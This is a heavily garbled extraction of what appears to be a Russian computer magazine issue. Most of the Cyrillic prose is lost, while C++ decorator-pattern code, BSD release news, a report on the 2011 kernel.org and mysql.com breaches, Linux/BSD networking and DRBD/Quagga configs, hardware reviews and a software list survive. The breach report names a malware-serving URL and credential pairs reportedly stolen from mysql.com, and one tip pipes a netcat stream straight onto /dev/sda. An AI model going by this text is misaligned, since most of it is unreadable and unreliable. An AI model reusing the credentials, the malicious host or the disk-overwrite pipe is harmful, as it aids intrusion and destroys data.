        // take the operator's base cost from the parent class
        // and apply the regional coefficient to it
        beelineUACost = SMSBeeline::cost() * coefficientUA;
        return beelineUACost;
    }
    ...
};
// SMSMegafonUA, SMSMegafonUA, SMSMtsUA, SMSMtsBY
// SMSBeelineBY SMSBeelineUA
? ,
. SMSBeeline,
SMSMegafon SMSMts cost()
,
SMSMtsBY, SMSMegafonUA . .
. , ( RU),
cost(). ,
.
- ,
. .
,
5 %. , , . . ,
. , ,
7 %,
5 %- ,
12 %.
,
. .
, .
class SMSBeelineUABirthdayDiscount: public SMSBeelineUA
{
public:
    virtual float cost()
    {
        ...
        // take the regional cost from the parent class
        // and apply the birthday discount coefficient to it
        beelineUABirthdayCost =
            SMSBeelineUA::cost() * coefficientBirthday;
        return beelineUABirthdayCost;
    }
    ...
};
//
// SMSBeelineUABirthdayDiscount
,
SMSBilling setDiscount(float),
,
.
class SMSBilling
{
protected:
    // protected so that the operator classes can read the discount in cost()
    float m_discount;
public:
    void setDiscount(float discount) { m_discount = discount; }
    virtual float cost() = 0;
    ...
};
class SMSBeeline: public SMSBilling
{
public:
    virtual float cost()
    {
        ...
        return beelineCost;
    }
    ...
};
// SMSMegafon SMSMts SMSBeeline
class SMSBeelineUA: public SMSBeeline
{
public:
    virtual float cost()
    {
        ...
        // apply the discount only if one has been set
        if (m_discount != 0)
            beelineUACost =
                SMSBeeline::cost() * coefficientUA * m_discount;
        else
            beelineUACost = SMSBeeline::cost() * coefficientUA;
        return beelineUACost;
    }
    ...
};
// SMSMegafonUA, SMSMegafonUA, SMSMtsUA, SMSMtsBY
// SMSBeelineBY SMSBeelineUA
billing = new SMSBeelineUA();
// ,
billing->setDiscount(0.1);
cost = billing->cost();
,
, ,
, ,
.
, .
. , ,
-. . ,
. , , SMSBilling
SMSBeeline, SMSMegafon SMSMts.
,
-. .
RegionDecorator,
SMSBilling.
,
SMSBilling.
. cost() RegionDecorator SMSBilling,
.
, . ,
.
class SMSBilling
{
public:
    virtual float cost() = 0;
    ...
};
class SMSBeeline: public SMSBilling
{
public:
    virtual float cost()
    {
        ...
        return beelineCost;
    }
    ...
};
class RegionDecorator: public SMSBilling
{
protected:
    // protected so that the concrete decorators can reach the wrapped object
    SMSBilling &m_billing;
public:
    RegionDecorator(SMSBilling &billing) :
        m_billing(billing)
    {
    }
    virtual float cost() = 0;
    ...
};
class RURegionDecorator: public RegionDecorator
{
public:
    RURegionDecorator(SMSBilling &billing) :
        RegionDecorator(billing)
    {}
    virtual float cost()
    {
        float costRU = m_billing.cost() * coefficientRU;
        return costRU;
    }
    ...
};
// UARegionDecorator
// RURegionDecorator
, RURegionDecorator,
UARegionDecorator . .
.
SMSBilling.
:
// create the base billing object for the operator
SMSBilling *billing = new SMSBeeline();
// "wrap" it in the regional decorator
billing = new RURegionDecorator(*billing);
// the call goes through the decorator to the wrapped object
float cost = billing->cost();
.
.
cost()
.
DiscountDecorator.
DiscountDecorator
class DiscountDecorator: public SMSBilling
{
protected:
    // protected so that the concrete decorators can reach the wrapped object
    SMSBilling &m_billing;
public:
    DiscountDecorator(SMSBilling &billing) :
        m_billing(billing)
    {
    }
    virtual float cost() = 0;
    ...
};
class BirthdayDiscountDecorator: public DiscountDecorator
{
public:
    BirthdayDiscountDecorator(SMSBilling &billing) :
        DiscountDecorator(billing)
    {
    }
    virtual float cost()
    {
        float costBirthday =
            m_billing.cost() * coefficientBirthday;
        return costBirthday;
    }
    ...
};
// ""
// BirthdayDiscountDecorator
// create the base billing object for the operator
SMSBilling *billing = new SMSBeeline();
// "wrap" it in the regional decorator
billing = new RURegionDecorator(*billing);
// wrap the result in the discount decorator
billing = new BirthdayDiscountDecorator(*billing);
// the call passes through both decorators
// down to the operator's base cost
float cost = billing->cost();
,
.
.
,
. ,
.
, -, (
setDiscount), -,
, ,
, .
. , :
, (
)
.
.
. z
(grinder@tux.in.ua),
(execbit.ru)
UNIXOID
INFO
OpenBSD
: 1
1 . 5.0
32 .
OPENBSD 5.0
FREEBSD 9.0
OpenBSD 2.3 2.4
,
Beastie,
Puffy
.
,
,
,
.
.
,
. OpenBSD FreeBSD
. ,
.
OpenBSD
BSD-
FreeBSD.
NetBSD DragonFlyBSD.
OpenBSD 19
(1995 ).
16 .
OpenBSD
LiveCD: MarBSD, Quetzal,
FuguIta, jggimi, OliveBSD,
AnonymOS, LiveCDOpenBSD, BSDanywhere
.
WWW
OpenBSD
openbsd.org.
OpenBSD openbsd.ru,
obsd.ru.
OpenBSD Journal
undeadly.org.
-
OpenBSD openports.se.
OPENBSD 5.0
OpenBSD 1995 , ,
NetBSD, -
.
, . Free, Functional and Secure
. , , , .
, , - ,
.
. (dhcpd, ntpd, bgpd) ,
.
API ( strlcat,
strlcpy, issetugid, arc4random ) (, Systrace, GCC/ProPolice), ,
OpenBSD .
OpenBSD ,
, Linux BSD-, (blob, binary linked
OpenBSD
object ),
. , ,
.
OpenBSD, gNewSense Gobuntu .
,
, BSD. ,
, Adaptec. ,
FSF , OpenBSD, .
( ,
, , ).
Makefile URL , . ,
.
OpenBSD 17
,
. BSD- ISC,
,
. BSD GPL,
. OpenBSD . , (sshd, ntpd, X ).
( Linux, , ), 16
. (Only two remote holes in the default install,
in a heck of a long time!) , (, openbsd.ru)
.
.
. 5.0.
: ,
, .
.
malloc
.
,
. .
.
UNIXOID
(hexdump, tcpdump, libc) , UTF-8.
OpenBSD 4.9
/etc/rc.d. 5.0
,
/etc/rc.d rc- rc.{local,shutdown}.
netstat -vP, PCB- (Protocol
Control Block), .
disklabel '-F', UID,
fdisk mount ( ).
pkg scp://hostname/~user/subdir.
Beagle board (
OMAP3530 ARM
Cortex-A8, Texas Instruments DigiKey).
OPENSSH 5.9
OpenBSD , , .
PF, IPFilter
BSD, NTP
OpenNTPD, OpenOSPFD OpenBGPD. ,
CVS OpenCVS.
OpenSSH SSH,
.
OpenSSH 5.9, 6 ,
sandboxes ()
systrace, seatbelt rlimit.
( )
. sandbox ,
.
UsePrivilegeSeparation sandbox, .
,
,
SSH-, ,
.
. systrace
OPENBSD/IPSEC?
2010 OpenBSD
IPsec.
,
, . , ,
. : goo.gl/Rl964.
. systrace,
SYSTR_POLICY_KILL
( OpenBSD). seatbelt, OS X/Darwin, ,
. rlimit
, .
setrlimit()
. sandbox
UseLogin .
ssh_config Host,
, .
* ( ) ? ( ), 5.9 !. ,
, , :
# cat /etc/ssh/ssh_config
Host *.example.org !host1.example.org
SONG 5.0
OpenBSD .
, .
5.0 What Me Worry? (goo.gl/dRisZ).
PC-BSD 9
FreeBSD 9.0
- PC-BSD 9.
ZFS
GELI-,
(KDE 4, GNOME 2, XFCE 4, LXDE) .
,
Life-Preserver .
PBI- ,
,
.
, freebsd-update
(, 9.0 9.1).
OpenBSD LiveCD
SHA256: HMAC-SHA2-256, HMAC-SHA2-256-96, HMAC-SHA2-512
HMAC-SHA2-512-96. ssh-keysign
ECDSA.
AuthorizedKeysFile (sshd_config) ,
. (%h
, %u . .), .
: AuthorizedKeysFile
, (
).
UserKnownHostsFile/GlobalKnownHostsFile
.
5.7 IPQoS TOS/DSCP/QoS,
. IPQoS IPv6.
ssh-keygen '-A', (RSA, DSA ECDSA)
( ).
. , , ssh-add < /path/to/key,
ssh-add
.
FREEBSD 9.0
C FreeBSD
9.0. , .
FreeBSD Linux , ,
.
FreeBSD 9 DTrace,
Solaris.
7.0,
DTrace
.
/ .
/ ,
UNIX.
LLVM Clang, GCC , .
GCC,
GPLv3, LLVM/Clang BSD,
FreeBSD -
FreeBSD 9.0
OpenBSD
. ,
GCC LLVM/Clang.
,
, Jail-,
RCTL,
,
, setrlimit(). rctl
,
, SIGHUP
syslog (
, ).
Capsicum,
, . Capsicum
,
SELinux AppArmor, .
,
cap_new() cap_enter()
, (
),
/
.
, , ,
( tcpdump , chromium ).
TCP-,
UNIXOID
FreeBSD 9.0
BSD-
*nix-:
SMP- ( 32 CPU),
TCP- CPU,
(HTCP, CUBIC, Vegas, HD CHD),
(Congestion Control) TCP.
TCP- ERTT
(Enhanced Round Trip Time),
Congestion Control.
sysinstall,
,
BSDinstall, . , ,
GPT-, ZFS Jail. , BSDInstall
(,
, ) .
, BSDinstall .
USB-, USB 3.0, XHCI (eXtensible Host Controller Interface).
, USB 1.0/2.0,
OHCI, UHCI EHCI.
Soft Updates UFS . ,
, fsck. UFS
TRIM,
SSD- .
GEOM, , ,
4K, .
gpart
,
UFS
4/32 .
GEOM , -
,
.
gsched_rr,
.
AES GEOM- GELI XTS,
.
RAID-
ataraid graid, ATA. , , GEOM
. RAID
. Intel,
JMicron, NVIDIA, Promise SiliconImage.
RAID-: RAID0, RAID1, RAID1E, RAID10, SINGLE, CONCAT.
GEOM- HAST,
ggate ,
master .
ZFS 28, , :
(),
.
RAIDZ3, , ,
.
ZFS zfs diff.
NFS- .
UFS NFSv4 ACL POSIX ACL. z
>>>> coding
coding
UNIXOID
(execbit.ru)
KERNEL.ORG,
LINUX.COM,
LINUXFOUNDATION.ORG
MYSQL.COM
kernel.org
Linux.
linux.com
linuxfoundation.org,
mysql.com.
,
?
.
INFO
,
mysql.com,
: ClamAV,
Rising, TrendMicro
TrendMicro-HouseCall.
Gitolite,
kernel.org,
,
$1000 ,
.
KERNEL.ORG,
kernel.org , ,
. John Warthog9 Hawley, kernel.org, users@kernel.org
(pastebin.com/BKcmMd47)
. ,
HPA (H Peter Anvin), hera,
odin1, , , demeter2, zeus1 zeus2.
.
:
1. 12 .
2. , .
3. Xnest
/dev/mem, ,
.
, , ,
. . . . , kernel.org
,
Linux, ,
Git, Warthog9,
, Google+, kernel.org, ,
3Leaf Systems, C2 Microsystems, Orion Multisystems,
web- Iowa Interactive .
, , ,
!
- Warthog9 ,
Phalanx SSH-,
Warthog9 - . , Phalanx,
, , 2008 SSH-,
.
cd /etc/khubd.p2/ rkhunter, ,
, kernel.org.
, , , . ,
, SSH-
kernel.org, ,
root - , Phalanx, .
, , .
kernel.org. ,
.
, . Corbet Linux Foundation (goo.gl/7MyRu),
.
Git ,
. , Git
,
.
, ,
, , .
, , , ,
, .
, .
,
kernel.org . Linux
github.com, , , (https://github.com/
torvalds/linux). , .
kernel.org
, SSH-. SSH Git,
HTTP.
,
Gitolite,
.
: goo.gl/1brFK.
kernel.org ( ).
: LINUX.COM
LINUXFOUNDATION.ORG
kernel.org linux.com
linuxfoundation.org.
, . , , , ,
, kernel.org.
SSH-,
. ,
kernel.org
Linux Foundation
.
linux.com linuxfoundation.org,
Open Printing, Linux Mark Foundation events
. 6
.
. , ,
Linux Foundation , , .
? , , , ,
, ,
kernel.org, , Linux Foundation . ,
, ,
SSH
. ,
kernel.org ,
SSH- - Linux Foundation,
Linux .
linux.com
(goo.gl/N1DZX) .
,
, .
Guru-2012 linux.com
.
MYSQL.COM,
Armorize (goo.gl/PGKRi),
web-,
mysql.com. HackAlert,
, MySQL. .
, JS-, ,
, IFrame. , ,
truruhfhqnviaosdpruejeslsuy.cx.cc/main.php,
BlackHole exploit pack. - Adobe Flash, Adobe PDF Java
MW:JS:159, FTP- ( PHP-, HTML- JS-).
UNIXOID
KERNEL-
kernel.org Greg Kroah-Hartman
kernel.org
.
,
,
chkrootkit ,
,
,
, .
: goo.gl/VYyCl.
JS-, mysql.com
JS-, mysql.com ( )
, linux.com
, , .
( 22 ).
mysql.com Oracle ,
, .
, mysql.com.
, Trend Micro .
mysql.com,
,
sourcecOde.
3000 root-
, MySQL. ,
, JS- .
. , sourcecOde,
.
, uname -a whoami Fedora Core 11
http1.web.mysql.com. ,
root, nmap dig. ,
, root-,
. ,
www
.
.
mysql.com . SQL- .
. ,
,
, sys:phorum5,
sysadm:qa. admin:6661 (,
!), ,
,
,
web-.
, mysql.com
.
WINEHQ.ORG
FEDORAPROJECT.ORG
root- mysql.com
opensource-. Wine,
appdb.winehq.org. Jeremy White,
.
,
. , , Jeremy White,
. ,
web- phpMyAdmin
. phpMyAdmin
. ,
,
.
,
phpMyAdmin ,
, SSH- OpenVPN.
Fedora
SSH- , ,
,
kernel.org, linuxfoundation.org linux.com.
30 ,
.
: , ,
, 12
, 20 .
.
. ?
, ,
kernel.org, . GNU:
savannah.gnu.org. SQL- ,
. , PHP-.
48 ,
,
.
.
2010 Apache Software
Foundation, , , .
.
apache.org 2009 ,
apachecon.org, 0day-, SSH- backup-
people.apache.org .
, mysql.com
- , ,
. kernel.org , Linux Foundation -
SSH- , kernel.org,
mysql.com .
,
. z
SYN/ACK
hatchet (maks.hatchet@yandex.ru)
,
UNIX-
.
-, .
.
, .
,
,
, Bluetooth, -
,
RAID-. ,
, .
,
.
PPTP/PPPoE-, , /
, , -
DHCP-.
, network-manager DHCP-,
.
.
.
quickswitch, -
, , , ifup
Debian/Ubuntu, . ,
: http://muthanna.com/quickswitch.
Perl,
switchto /usr/local/bin.
quickswitch
,
/etc/quickswitch/switchto.conf :
# vi /etc/quickswitch/switchto.conf
[config]
//
device=eth0
//
servicefilename=/etc/quickswitch/switchto.last
// home
[home]
description=home
address=192.168.0.25
netmask=255.255.255.0
gateway=192.168.0.1
dns1=195.62.99.42
dns2=195.62.97.177
// work
[work]
description=work
address=10.16.3.114
netmask=255.255.255.0
gateway=10.16.3.249
dns1=195.62.99.42
switchto:
$ sudo switchto work
$ sudo switchto home
,
,
wpa_supplicant. :
$ su -s
# mv /etc/wpa_supplicant.conf /etc/wpa_supplicant.conf.bak
# wpa_passphrase ssid/- >> \
/etc/wpa_supplicant/wpa_supplicant.conf
:
$ sudo ifconfig wlan0 up
$ sudo iwconfig wlan0 essid $net
$ sudo wpa_supplicant -B -Dwext -i wlan0 \
-c /etc/wpa_supplicant.conf
$ dhcpcd wlan0
, . , , :
# vi /usr/local/bin/tryconnect.sh
#!/bin/sh
# Wired network profiles (sections of /etc/quickswitch/switchto.conf)
NETS="home work"
# Wireless networks (SSIDs)
WNETS="home work"
# Check connectivity by pinging a public DNS server;
# if it answers, the script has nothing more to do and exits
tryping() {
if ping -q -n -c 1 8.8.8.8; then exit; fi
}
# Perhaps the network is already up
tryping
# If not, try every profile listed in $NETS
for net in $NETS; do
switchto $net; sleep 10
tryping
done
# Still nothing, try DHCP on the wired interface
dhcpcd eth0
sleep 5
tryping
# Still nothing, fall back to Wi-Fi
killall dhcpcd
ifconfig wlan0 up
# Try every Wi-Fi network listed in $WNETS
for net in $WNETS; do
iwconfig wlan0 essid $net
wpa_supplicant -B -Dwext -i wlan0 \
-c /etc/wpa_supplicant.conf
sleep 10
dhcpcd wlan0
sleep 5
tryping
done
FTP DD
OPENBSD
,
speedtest.net. ftp-:
OpenBSD
:
//
# ifconfig em0 up
//
# ifconfig ath0 nwid my_wlan up
//
# ifconfig trunk0 trunkproto failover \
trunkport em0 trunkport ath0 \
192.168.1.1 netmask 255.255.255.0
Wi-Fi.
netcat, ,
(
-2 -1):
-1# netcat -l -p 9000 | dd of=/dev/sda
-2# dd if=/dev/sda | netcat IP--1 9000
, ,
100 %, .
crontab,
, , ,
:
$ sudo crontab -e
*/5 * * * * /usr/local/bin/tryconnect.sh
. network-manager
.
PPPoE/PPTP-
3G- wvdial.
BLUETOOTH-
Wi-Fi, . ? ,
, Wi-Fi-
.
Bluetooth, ,
( USB-Bluetooth-)
.
Bluetooth
IP-, Linux,
BSD-. PAN (Personal
Area Networking), BNEP (Bluetooth Network
Encapsulation Protocol).
quickswitch
Linux :
1. ,
, pand, :
$ sudo pand --listen --role NAP
2. bnep0, pand:
$ sudo ifconfig bnep0 192.168.0.1
, ,
, NAT:
$ sudo sysctl -w net.ipv4.ip_forward=1
$ sudo iptables -t nat -A POSTROUTING \
-o eth0 -j MASQUERADE
FreeBSD:
1. sdpd,
Bluetooth- ,
Bluetooth-:
# kldload ng_ubt
# /etc/rc.d/sdpd start
2. - btpand :
# ifconfig tap0 create
# btpand -i tap0 -s NAP
# ifconfig tap0 192.168.0.1 netmask 255.255.255.0
3. - :
#
#
#
#
4. ,
NAT:
# sysctl net.inet.ip.forwarding=1
# ipfw add nat 123 all from tun0 to any
MAC-
:
deluge,
-.
:
# vi /usr/local/bin/autotorrent.sh
#!/bin/bash
# ( ),
#
IDLE=120000
#
STOPCMD="transmission-remote -S"
#
STARTCMD="transmission-remote -s"
# STOPCMD="deluge-console pause \*"
# STARTCMD="deluge-console resume \*"
STOPPED="yes"
while true; do
if [ "$(xprintidle)" -gt "$IDLE" ]; then
if [ $STOPPED = "yes" ]; then
$STARTCMD
STOPPED="no"
fi
else
if [ $STOPPED = "no" ]; then
$STOPCMD
STOPPED="yes"
fi
fi
sleep 60
done
STOPCMD STARTCMD
.
-. , deluge ,
deluged.
~/.config/autostart:
# ln -s /usr/bin/deluged ~/.config/autostart
:
trickle, , -
ALSA
arecord,
. ,
SYN/ACK
, , . ,
netcat,
. , VoIP-
:
-1$ netcat -l -p 5555 | aplay
-2$ arecord | netcat IP--1 5555
-2 -1. .
, .
,
,
.
, ALSA , :
$ vi .asoundrc
pcm.copy {
type plug
slave {
pcm hw
}
route_policy copy
}
arecord netcat:
-2 $ arecord -D copy | netcat IP--1 5555
RAID1
RAID. ,
.
, RAID- , RAID-
.
, , .
Linux/BSD-, , , ,
.
, ,
.
RAID-
, , RAID (, ,
IDE ),
(
). :
. ,
,
!
. 2009
Linux DRBD (Distributed
Replicated Block Device),
, , ,
-, , .
,
Linux.
, :
1. . ,
.
fdisk/cfdisk GNU Parted. ,
, , .
, ,
: sda5 192.168.0.1 sda7 192.168.0.2.
, ,
. DRDB ,
, master-.
, master- ,
.
2. ,
. ,
: shared-secret
, disk
, address .
:
# vi /etc/drbd.conf
global { usage-count no; }
common { syncer { rate 100M; } }
resource r0 {
protocol C;
startup {
wfc-timeout 15;
degr-wfc-timeout 60;
}
net {
cram-hmac-alg sha1;
shared-secret "";
}
on node1 {
device /dev/drbd0;
disk /dev/sda5;
address 192.168.0.1:7788;
meta-disk internal;
}
on node2 {
device /dev/drbd0;
disk /dev/sda7;
address 192.168.0.2:7788;
meta-disk internal;
}
}
DRBD-.
drbd-utils drbd8-utils.
3.
drbdadm:
# drbdadm create-md r0
.
DRBD-:
# /etc/init.d/drbd start
DRBD-
(,
drbdadm up all),
DRBD master-, ,
.
/etc/gg.exports -
, :
4. master- DRBD, :
, ,
- ggate, :
192.168.0.2 RW /dev/ad0s1d
.
/proc/drbd.
5. .
DRBD- :
# mkfs.ext4 /dev/drbd0
# mount /dev/drbd0 /mnt
, /mnt,
.
, master- . ,
.
FreeBSD .
GEOM- ggate, , GEOM- gmirror
RAID1.
, DRBD Linux.
, ,
.
DRBD, . , .
GEOM-:
# kldload geom_mirror
# kldload geom_gate
, ggate
, .
-
:
# ggatec create 192.168.100.2 /dev/ad0s1d
, ( ,
ggate0). ,
- ( /dev/ad0s1d) /dev/ggate0
RAID1- gmirror:
# gmirror label -v -b prefer gm0 ggate0 ad0s1d
, .
, : ) , )
prefer .
/ :
# fsck -t ufs /dev/mirror/gm0
# mount /dev/mirror/gm0 /mnt
,
UNIX-,
man-. ,
! z
SYN/ACK
SYN/ACK
grinder
grinder (grinder@tux.in.ua)
,
.
.
,
.
.
VIDEO
BIRD
bird.network.cz.
C Quagga quagga.net.
Quagga quagga.
net/docs.
RFC
ietf.org.
WARNING
Quagga
CONFIG_NETLINK,
CONFIG_RTNETLINK
CONFIG_IP_MULTICAST.
INFO
Quagga
.
,
,
.
/usr/
share/doc/quagga/
tools
LINUX
: ,
() ?
?
? , -.
,
cron IP .
c .
iproute2. , , ,
( 192.168.0.2 192.168.1.2 ,
192.168.0.1 192.168.1.1 ):
#echo "1_ISP" >> /etc/iproute2/rt_tables
#echo "2_ISP" >> /etc/iproute2/rt_tables
#ip route add 192.168.1.0/24 dev eth0 src \
192.168.1.2 table 1_ISP
#ip route add default via 192.168.1.1 table 1_ISP
#ip route add 192.168.0.0/24 dev eth2 src 192.168.0.2 \
table 2_ISP
#ip route add default via 192.168.0.1 table 2_ISP
#ip rule add from 192.168.1.2 table 1_ISP
#ip rule add from 192.168.0.2 table 2_ISP
#ip route add default scope global nexthop via \
192.168.1.1 dev eth0 weight 1 \
nexthop via 192.168.0.1 dev eth2 weight 1
,
. ,
, ,
. :
RIP, OSPF, BGP, IGRP, EIRGP, IS-IS .
, ,
. - , , . :
RIP (Routing Information Protocol) BSD
.
,
.
(, . hope).
30 , .
(next hop)
. RIP . 15.
180 ,
16 . ,
.
RIPv2 (RFC 2453) RIPng ( IPv6). 520/UDP.
debian.conf
. Quagga
,
zebra (core daemon),
,
API.
.
vtysh,
Quagga. vtysh Cisco CLI,
, Cisco, ,
.
Quagga Linux, *BSD OpenSolaris. Ubuntu
:
$ sudo apt-get install quagga
# vi /etc/sysctl.conf
net.inet.ip.forwarding=1
/etc/ospfd.conf
ospf6d.conf, .
*nix ( Linux)
, :
BIRD (BIRD Internet Routing Daemon, bird.network.cz) RIPv2,
BGPv4, OSPFv2/v3,
.
Quagga (quagga.net) , BGPv4 v4+, RIP v1/v2/v3, RIPng, OSPF
v2/v3 IS-IS.
,
.
, .
, . ,
.
/etc/quagga. ,
,
: quagga.net/doc. (
) /etc/quagga/daemons.
. OSPF:
$ sudo nano /etc/quagga/daemons
zebra=yes
ospfd=yes
bgpd=no
# OSPF IPv6
ospf6d=no
ripd=no
# RIPng IPv6
ripngd=no
isisd=no
yes no ,
: 1 ( )10 ( ) 0 ().
TCP-, , /etc/services:
$ grep zebra /etc/services
, Quagga
.
SYN\ACK
SYN/ACK
grinder (grinder@tux.in.ua)
,
, terminal mode.
,
/etc/quagga/debian.conf ( /etc/
init.d/quagga), '--keep_kernel'
'--retain'.
$ sudo nano /etc/quagga/debian.conf
vtysh_enable=yes
zebra_options=" --daemon -A 127.0.0.1 -u quagga \
--keep_kernel --retain"
ospfd_options=" --daemon -A 127.0.0.1 -u quagga"
'--daemon'
IP-, (-A 127.0.0.1).
vtysh_enable
. ,
, '-u quagga'.
:
, Quagga
, .
OSPF
/usr/share/doc/quagga/examples
, :
$ sudo cp -v /usr/share/doc/quagga/examples/zebra.conf.sample \
/etc/quagga/zebra.conf
$ sudo cp -v /usr/share/doc/quagga/examples/ospfd.conf.sample \
/etc/quagga/ospfd.conf
$ sudo cp -v /usr/share/doc/quagga/examples/vtysh.conf.sample \
/etc/quagga/vtysh.conf
:
list
Quagga.
$ sudo service quagga restart
.....
Starting Quagga daemons (prio:10): zebra ospfd.
,
. ps aux | grep quagga netstat -ant ,
.
,
. ,
vtysh. !
#. zebra.conf:
multicast
!
! ( )
ip route 0.0.0.0/0 11.22.33.44
! , /var/log/quagga
! / quagga:quagga
ospfd.conf
.
! ospf
area 0
network 192.168.0.0/24 area 0
! network 172.10.10.0/16 area 1
log file /var/log/quagga/ospfd.log
. telnet vtysh.
:
$ sudo vtysh
.
, list. :
# configure terminal
.
, ,
,
.
(config)# service password-encryption
(config)# exit
;
# show memory
# write memory
Integrated configuration saved to /etc/quagga/Quagga.conf [OK]
, ,
. Quagga.conf, ,
. show startup-config . .
# show ip route
Codes: K - kernel route, C - connected, S - static,
R - RIP, O - OSPF, I - ISIS, B - BGP,
> - selected route, * - FIB route
S 0.0.0.0/0 [1/0] via 192.168.10.2, eth0
K>* 0.0.0.0/0 via 192.168.10.2, eth0
C>* 127.0.0.0/8 is directly connected, lo
K>* 169.254.0.0/16 is directly connected, eth0
OSPF
, .
(IP 192.168.1.2):
(config)# ip route 10.0.0.0/8 192.168.1.2
,
OSPF.
, .
(config)# router ospf
; ID , IP
(config-router)# ospf router-id 192.168.0.1
;
(config-router)# redistribute connected
(config-router)# redistribute static
;
(config-router)# neighbor 192.168.1.2
(config-router)# neighbor 192.168.2.2
(config-router)# default-information originate
(config-router)# end
# write file
( ), default-information originate.
, static route, .
.
, router-id neighbor.
.
# show ip ospf database
# show ip ospf neighbor
# show ip ospf database
# show interface
# show debugging ospf
write memory
. , ,
, . , . z
FERRUM
QUADRATISCH.
PRAKTISCH. GUT
GIGABYTE GA-H61N-USB3
ATX , , ,
, .
. Micro-ATX,
.
Mini-ITX. . , GIGABYTE GA-H61N-USB3.
,
Mini-ITX Intel
H61 Express. -, .
GIGABYTE GA-H61N-USB3
, , PEG ( SLI
CrossFireX ). . ,
DDR3
1333 , !
, . ,
PCI Express 16
, . Intel
P67 Express Intel Z68 Express.
PCI Express, USB 2.0 SATA II.
, USB 3.0 SATA 3.0 .
-
, ,
SATA
Intel H67 Express. ,
. ,
Intel H61 Express RAID'. ,
Intel
SSD,
. ,
, . .
, HTPC
SATA II,
23
, Dual BIOS . , GIGABYTE GA-H61N-USB3
,
RAID- .
. ,
.
DIMM, PCI Express x16.
,
BIOS ( Smart 6)
.
,
, , - .
, Super Pi 1.5 XS
,
wPrime 32 ,
Intel Sandy Bridge. WinRAR
CINEBENCH , ,
HD-.
, , Intel H61
Express ,
.
.
,
GIGABYTE GA-H61N-USB3 . ,
, GIGABYTE Super 4 GIGABYTE
Ultra Durable 3. ,
GIGABYTE GA-H61N-USB3
, , :
HTPC. z
3000
.
,
Mini-ITX (170 170 )
.
Nano-ITX (120 x 120 ) PicoITX (100 x 72 ). ,
GIGABYTE GA-H61N-USB3 .
: LGA1155
: Intel H61 Express
: DDR3, 8001333
: 1x PCI Express x16
: 2x SATA II
: Ethernet, 10/100/1000 /
: 7.1 CH, HDA, Realtek
ALC889
: 1x DVI, 1x
D-Sub, 1x HDMI, 2x USB 3.0, 4x USB 2.0,
1x eSATA, 2x S/PDIF, 1x RJ-45, 3
: Mini-ITX, 171 171
:
Intel Core i5-2400, 3,1
:
GIGABYTE GA-H61N-USB3
: Kingston
KVR1066D3N7K2/2G, 2x 1
SSD: Corsair Force F120,
120
: HIPER TYPE
K1000, 1000
: Windows 7
FERRUM
,
EDIFIER MP250
1300
.
Edifier, ,
.
:
Edifier MP250 . ,
, , .
!
Edifier MP250 ,
. , .
, ,
,
. Edifier MP250
,
.
USB mini-USB, jack-tojack .
.
,
. , Edifier MP250 :
.
:
: RMS 2 2
/: 75
- -: 4 1,25
-: , 3 1,25
: USB, 3,5 jack
: USB,
: 261 36 44
: 0,33
USB-.
. USB.
3,5
. ,
,
USB,
.
,
,
. ,
,
. ,
. ,
.
Edifier MP250
. Edifier MP250 -
,
.
. Edifier MP250 .
, .
( , )
.
Edifier MP250
. ,
.
-
,
Edifier MP250. ,
, . ,
? ,
. z
>Net
BenderConverter
Colasoft Packet Player 1.2
Device Doctor 2.0
digsby
Echo Mirage 1.2
Feed Notifier 2.5
FVD Suite 2.6.8
Google.mE 1.50
inSSIDer 2.0.7
MetroTwit
NetSpeedMonitor 2.5.4.0
NFReader 1.4.1
Odysseus 2.0.0.84
ooVoo 3.0.4
RevoluTV 2.5
>Multimedia
AIMP 3.00 Beta 5
DeepBurner 1.9
DipTrace 2.2
Evernote 4.5.1
Foxit Reader 5.1
GeeTeeDee 0.1.274
GIMPshop 2.2.8
Greenshot 0.8.1
IrfanView 4.30
PicPick 3.0.9
Virtual DJ 7.0.5
Virtual Piano 4.0
WorldWide Telescope 3.0.5.1
Xbmc 10.1
XnConvert 1.10
>Misc
AltDrag 0.9
CollageIt
Desk Drive 1.8.2
DeskView
Dropresize
F.lux
FilerFrog 2.0
FluentNotepad
Q10 1.2.21
RandomScreensaver 2.0.1
Scrybe 1.6.4
TaskDock
Wheel Here 1.4.2
Windows Themes Installer 1.1
YoWindow 2.0
>>WINDOWS
>Development
BinVis
CollabNet Subversion Edge 2.1.1
Crack.NET 1.2
Dependency Walker 2.2
Expresso 3.0
HttpWatch 7.2
Immunity Debugger 1.83
jQueryPad
Parrot 3.9.0
Scapy 2.2.0
SQLiteStudio 2.0.19
VisualSVN Server 2.5
WebStorm 3.0
WinAppDbg 1.4
>Devel
Dojo 1.6.1
Fltk 3.0.x-r9155
Fpdf 1.7
Glade 3.10.2
Gwt 2.4.0
>>UNIX
>Desktop
Audacity 1.3.13-beta
Blender 2.60a
Darktable 0.9.2
Digikam 2.2.0
Dvdstyler 2.0
Gcad3d 1.70
Inscape 0.48.2
Kmplayer 0.11.3a
Luckybackup 0.4.6
Midnight commander 4.8.0
Peazip 4.1
Picasa 3.0
Postr 0.12.4
Seahorse 2.28.1
Soundkonverter 1.2.0
Sox 14.3.2
Xneur 0.14.0
Zim 0.53
>System
Chameleon Shutdown 1.1.1.30
Disk Space Fan
Drive Backup 0.0604
HD Speed 1.7.1.90
IObit Toolbox 1.2
LockNote 1.0.5
MenuMaid 1.0.1
MonitorES 1.0.1
NirLauncher
QRM Plus Manager 1.0
RecycleBinEx 1.0.5.530
Soluto
Switcher 2.0.0
SystemMonitor 1.64
WinBubble 2.0
WindowMenuPlus 1.14
Sql-Injection:
MySqloit 0.1
SQID 0.3
SQL Power Injector 1.2
Sqlbftools 1.2
SQLBrute
Sqlmap 0.9
SQLNinja 0.2.6
>Security
AppAdmin 1.1.0
BeEF 0.4.2.10
Free File Wiper 0.7d
Freeraser 1.0.0.23
Secret Disk 1.35
Telemachus 1.0
Tor 0.2.2.34
USB Port Locked 2.0
Volatility 2.0
WinLockr
WipeFile 2.1.1
>Server
Apache 2.2.21
Asterisk 1.6.2.20
>Security
Clamav 0.97.3
Ctunnel 0.6
Gnutls 3.0.5
Nikto 2.1.4
Pac 3.3.5
Passwordsafe 0.6.0beta
Pdfcrack 0.11
Saferhoneypot 20111027
Slackfire 0.65.e
Snare 2.0.0
ARMu 0.17b
DOM Snitch v0.725
ExaScan
Exploit Pack
findmyhash 1.1.2
hash-identifier 1.1
Hatkit Proxy 0.5.1
L0phtCrack v6.0.12c
Ostinato v0.5
PacketFence 3.0.2
Watcher 1.5.4
WiFuzz
xSQLScanner 1.2
>Net
Amule 2.3.1rc2
Bareftp 0.3.9
Bitlbee 3.0.3
Blam 1.8.7
Chrome 13.0.782
